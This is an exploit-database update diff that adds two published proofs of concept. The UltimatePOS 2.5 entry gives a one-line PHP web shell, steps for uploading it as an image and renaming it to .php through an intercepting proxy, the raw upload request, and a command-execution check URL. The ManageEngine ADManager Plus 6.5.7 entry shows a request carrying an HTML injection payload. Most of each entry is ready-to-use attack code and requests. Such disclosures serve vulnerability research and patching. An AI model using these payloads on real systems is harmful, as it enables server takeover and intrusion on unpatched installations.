DB: 2018-08-26

2 changes to exploits/shellcodes

UltimatePOS 2.5 - Remote Code Execution
ManageEngine ADManager Plus 6.5.7 - HTML Injection

exploits/php/webapps/45253.txt

@@ -0,0 +1,64 @@
+# Exploit Title: UltimatePOS 2.5 - Remote Code Execution
+# Google Dork: intext:"UltimatePOS" 
+# Date: 2018-08-22
+# Exploit Author: Renos Nikolaou
+# Vendor Homepage: http://ultimatefosters.com/
+# Software Link: https://codecanyon.net/item/saas-superadmin-module-for-ultimatepos-advance/22394431
+# Version: 2.5
+# Tested on: Windows 10
+# CVE: N/A
+# Description : UltimatePOS 2.5 allows users to upload arbitrary files which 
+# leads to a remote command execution on the remote server.
+
+# PoC
+# 1) Create a file with the below PHP code and save it as jpg
+
+<?php $cmd=$_GET['cmd']; system($cmd); ?>
+
+# 2) Login to UltimatePOS portal as low priviliage user
+# 3) At the left hand side go to Products --> List Products ( http://domain/products )
+# 4) Click at the Actions button of a current product --> Edit
+# (NOTE: Attack works if you add new product as well)
+# 5) Under Product image: click Browse and upload your jpg file containing the PHP code mentioned at step 1. 
+# (Make sure to use proxy like Burp, Fiddler etc..etc)
+# 6) Scroll Down, click Update and Intercept the request using proxy
+# 7) Forward the requests until you reach the from request containing the product details 
+# (See the request below) including the filename of the file that you have uploaded.
+# 8) Edit the filename from filename.jpg to filename.php and then release the Interception.
+# 9) Go to the List Products again (Step 3) and fine the product that you have edited.
+# 10) Right click at the Product image and select Copy image Location
+# 11) Paste the URL into your browser. Will be similar to: http://domain/storage/img/1533988576_cmd.php
+# 12) Verify the exploit: http://domain/storage/img/1533988576_cmd.php?cmd=id
+
+
+# The request:
+===================
+
+POST /products/64 HTTP/1.1
+Host: domain.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://domain.com/products/64/edit
+Cookie: 
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data; boundary=---------------------------3062816822434
+Content-Length: 2868
+
+...
+
+50
+-----------------------------3062816822434
+Content-Disposition: form-data; name="image"; filename="cmd.php"
+Content-Type: image/jpeg
+
+<?php $cmd=$_GET['cmd']; system($cmd); ?>
+
+-----------------------------3062816822434
+Content-Disposition: form-data; name="weight"
+
+pos_confirmed.PNG
+
+...

exploits/windows/webapps/45254.txt

@@ -0,0 +1,51 @@
+# Exploit Title: ManageEngine ADManager Plus 6.5.7 - HTML Injection
+# Date: 2018-08-21 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.manageengine.com/
+# Hardware Link : https://www.manageengine.com/products/ad-manager/
+# Software : ZOHO Corp ManageEngine ADManager Plus
+# Product Version:  6.5.7
+# Vulernability Type : Code Injection
+# Vulenrability : HTML Injection
+# CVE : CVE-2018-15608
+
+# ZOHO Corp ManageEngine ADManager Plus 6.5.7 allows HTML Injection on 
+# the "AD Delegation" "Help Desk Technicians" screen.
+
+# HTTP Request Header :
+
+Request URL: http://172.16.2.105:8080/ADMPTechnicians.do?methodToCall=listTechnicianRows
+Request Method: POST
+Status Code: 200 OK
+Remote Address: 172.16.2.105:8080
+Referrer Policy: no-referrer-when-downgrade
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Connection: keep-alive
+Content-Length: 301
+Content-type: application/x-www-form-urlencoded;charset=UTF-8
+Cookie: adscsrf=614ff642-779b-41aa-bff5-44370ad770c2; JSESSIONID=79DE1A7AE1DC5B7D88FCBF02AB425987; JSESSIONIDSSO=19AA1682A937F344D1DCB190B31343FB
+Host: 172.16.2.105:8080
+Origin: http://172.16.2.105:8080
+Referer: http://172.16.2.105:8080/Delegation.do?selectedTab=delegation&selectedTile=technicians
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
+X-Requested-With: XMLHttpRequest
+
+# HTTP Response Header :
+
+Content-Length: 3753
+Content-Type: text/html;charset=UTF-8
+Date: Tue, 14 Aug 2018 10:14:32 GMT
+Server: Apache-Coyote/1.1
+X-Content-Type-Options: nosniff
+X-XSS-Protection: 1
+
+# Query String Parameters :
+
+methodToCall: listTechnicianRows
+
+# Form Data :
+
+params: {"startIndex":1,"range":10,"searchText":"\"><h1>Ismail Tasdelen</h1>","ascending":true,"isNavigation":false,"adminSelected":false,"isNewRange":false,"sortColumn":FULL_NAME,"typeFilters":"","domainFilters":"","viewType":defaultView}
+adscsrf: 614ff642-779b-41aa-bff5-44370ad770c2

files_exploits.csv

@@ -39854,3 +39854,5 @@ id,file,description,date,author,type,platform,port
 45247,exploits/php/webapps/45247.txt,"Twitter-Clone 1 - 'code' SQL Injection",2018-08-23,L0RD,webapps,php,
 45248,exploits/windows/webapps/45248.txt,"PCViewer vt1000 - Directory Traversal",2018-08-23,"Berk Dusunur",webapps,windows,
 45252,exploits/hardware/webapps/45252.txt,"Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)",2018-08-24,cakes,webapps,hardware,
+45253,exploits/php/webapps/45253.txt,"UltimatePOS 2.5 - Remote Code Execution",2018-08-25,"Renos Nikolaou",webapps,php,
+45254,exploits/windows/webapps/45254.txt,"ManageEngine ADManager Plus 6.5.7 - HTML Injection",2018-08-25,"Ismail Tasdelen",webapps,windows,